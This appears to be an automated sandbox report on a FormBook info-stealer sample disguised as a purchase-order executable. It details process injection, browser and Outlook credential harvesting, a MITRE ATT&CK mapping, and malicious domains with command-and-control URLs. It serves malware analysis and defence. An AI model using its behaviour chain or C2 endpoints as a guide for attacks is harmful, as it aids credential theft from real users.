Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\grpconv.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\grpconv.exe Section loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: read write
Source: C:\Windows\SysWOW64\grpconv.exe Section loaded: NULL target: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\grpconv.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\grpconv.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\grpconv.exe Thread register set: target process: 7936
Source: C:\Windows\SysWOW64\grpconv.exe Thread APC queued: target process: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A5B008
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe"
Source: C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe Process created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"
Source: C:\Windows\SysWOW64\grpconv.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: Purchase Order_ AEPL-2324-1126.exe, JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000002.00000003.1596207588.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1596658465.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders".lnk%HOMEDRIVE%%HOMEPATH%.pif%USERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: ?Program Manager
Source: JkyHsYXxoyjW.exe, 00000003.00000002.3864797915.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000000.1519795840.0000000000EF0000.00000002.00000001.00040000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000006.00000002.3865099185.0000000001290000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: svchost.exe, 00000002.00000003.1596658465.000000000302E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594446965.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JkyHsYXxoyjW.exe, 00000003.00000002.3863139699.0000000000868000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FileDescriptionWindows Progman Group Converterh$
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 0_2_0041E364
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Stealing of Sensitive Information

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\grpconv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\grpconv.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: WIN_XP
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: WIN_XPe
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: WIN_VISTA
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: WIN_7
Source: Purchase Order_ AEPL-2324-1126.exe Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1627616041.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3868781566.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1628046718.0000000003640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3868947164.0000000004200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3858711840.00000000002D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3871192963.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1628574210.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.3865120217.0000000002590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\Purchase Order_ AEPL-2324-1126.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
MITRE ATT&CK Matrix (a number before a technique is the count of matched signatures for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph
Behavior Graph ID:1515799
Sample:Purchase Order_ AEPL-2324-1...
Startdate:23/09/2024
Architecture:WINDOWS
Score:100
Process tree and per-node signatures:
• Purchase Order_ AEPL-2324-1126.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process
• svchost.exe (started by Purchase Order_ AEPL-2324-1126.exe): Maps a DLL or memory area into another process
• JkyHsYXxoyjW.exe (injected by svchost.exe): Found direct / indirect Syscall (likely to bypass EDR)
• grpconv.exe (started by JkyHsYXxoyjW.exe): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
• JkyHsYXxoyjW.exe (injected by grpconv.exe): Found direct / indirect Syscall (likely to bypass EDR); network: bluegirls.blog 195.110.124.133, 49717, 49718, 49719 REGISTER-ASIT Italy; www.solisbysobha.net 198.50.252.64, 49725, 49726, 49727 OVHFR Canada; 13 other IPs or domains
• firefox.exe (started by grpconv.exe)
Sample-level nodes: www.shopdj00.xyz; www.rtpngk.xyz (Performs DNS queries to domains with low reputation); 27 other IPs or domains; Multi AV Scanner detection for domain / URL; Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); 8 other signatures

Source | Detection | Scanner | Label | Link
Purchase Order_ AEPL-2324-1126.exe | 27% | Virustotal | | Browse
Purchase Order_ AEPL-2324-1126.exe | 100% | Avira | HEUR/AGEN.1321886 |
Purchase Order_ AEPL-2324-1126.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1515799
                                Start date and time:2024-09-23 14:35:11 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 11m 5s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:2
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:Purchase Order_ AEPL-2324-1126.exe
                                Detection:MAL
                                Classification:mal100.troj.spyw.evad.winEXE@7/2@16/15
                                EGA Information:
                                • Successful, ratio: 75%
                                HCA Information:
                                • Successful, ratio: 91%
                                • Number of executed functions: 54
                                • Number of non-executed functions: 303
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
Time | Type | Description
08:37:20 | API Interceptor | 9797964x Sleep call for process: grpconv.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                162.0.238.246RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                • www.quantis.life/hczh/
                                LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                • www.inchey.online/ercr/
                                198.50.252.64iuwxw7l3B8.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                • www.verenasbooks.store/hjdr/?aytH=7m7AmZ9BBJEagLLeZgr2XL6fJR0y+AEH3ntgHoqZ8GszJNEXChLSj6Lc9CsP8jGA+phvNyfEJtPzAws3azF8kZW9pKZWzmns8g==&dF=zeCQgMQZOsoc6
                                JXKpeA9gSm.exeGet hashmaliciousFormBookBrowse
                                • www.carrconsulting.xyz/ippd/?JEqt=9n5vjw5BL&fIZhqNlL=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91srV9JQCufFuNg==
                                    vbc.exe | malicious | FormBook | www.manessi.xyz/tic4/?nT2D4O=wmM+JQLX/LTjIkhLav/7pifcu4/qS9Lf16ILZkXVwVQxvUCe6R/jkMB9z+OmOvy7WtV1AtFnTgBDorlVThTsxCjUbfcAlbJTSw==&3zz7d=KBnjbttNLxpc
                                    Order specification.exe | malicious | FormBook | www.carrconsulting.xyz/ippd/?P3P2FX=dsNnsySir6HfQ56p&4oY8PKi=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                    SecuriteInfo.com.Win32.PWSX-gen.93.10409.exe | malicious | FormBook | www.carrconsulting.xyz/ippd/?Rp6W=x4IN&dpa=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                    new_order_quotation_030022023000000000000000_PDF.exe | malicious | FormBook | www.carrconsulting.xyz/h68b/?61=C8_gzqz&KLfb=mpCHzHLyAvu5qhW/nYzCL2lBNLEE+CMBrQrhb716kuEaaBIYUPWJ/npU0F7qJ9VEN3zOet630ULeAunXG2JUp/WcIwhRRlWzbQ==
                                    Order specification.exe | malicious | FormBook | www.carrconsulting.xyz/ippd/?qkmio=TvFaelEDVSuf1D8o&S9=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo4n5XU3YQKo5NfOQ==
                                    Order specification.exe | malicious | FormBook | www.carrconsulting.xyz/ippd/
                                    rfq_items_order_purchase_quotation_27012023000000000000_PDF.exe | malicious | FormBook | www.carrconsulting.xyz/h68b/?f-pX=mpCHzHLyAvu5qhW/nYzCL2lBNLEE+CMBrQrhb716kuEaaBIYUPWJ/npU0F7qJ9VEN3zOet630ULeAunXG2JVmdHXaW9vQA/fZA==&RNxq=9ncpHuCJAEbu9IR
                                    Order specification.exe | malicious | FormBook | www.carrconsulting.xyz/ippd/?SBo=zNT0B&fwZG=OyXFxvvgpcLcRqR+QVgY8OZ5s1CF8ip7ZgF4/hB4mo4TVQOl2nAT57D2kXHzhRsnyQCaeCXL3uGHhLOpIDo91pvEga4CvfN2Ng==
                                Match: 62.149.128.40
                                    PO76389.exe | malicious | FormBook | www.fimgroup.net/f3w9/
                                    bintoday1.exe | malicious | FormBook | www.fimgroup.net/m3ft/
                                    Atlas Copco- WEPCO.exe | malicious | FormBook | www.fimgroup.net/fqzh/
                                    file No83293 PO & Specification.gz.exe | malicious | FormBook | www.pyrlist-test.cloud/apau/?32gdi4=omLpuGVmsyOHdGpRdjgRwIdS8onMLPtYZwnQxrZ2pdkklfz3vB2UBDvQaSU1YR7Xr6uYdwMb/adcCe42hD+vmDiudnADMik3xc+FpjXk83bBo7qDRClwT378wlWS9dAj4UFWXQx8lPSh&wLAt=m8MLyLih-H4lf
                                    64MXEd79F1.exe | malicious | FormBook | www.autoreediritto.com/aucq/?pZXDmpb8=KoQMLvtx3M4SfAq6wckzW9CSarLFnHHB0euSLOV9eLfxROMJcI8ufZi+pNPsARzNL1LmWOMQM+kJCjoighlqXenXGQFHAUL+cMNE98AcgW9WHO0Ixf81xDLisHhibZAVvCGoKVw=&fv=tdYXXJI8Drl4
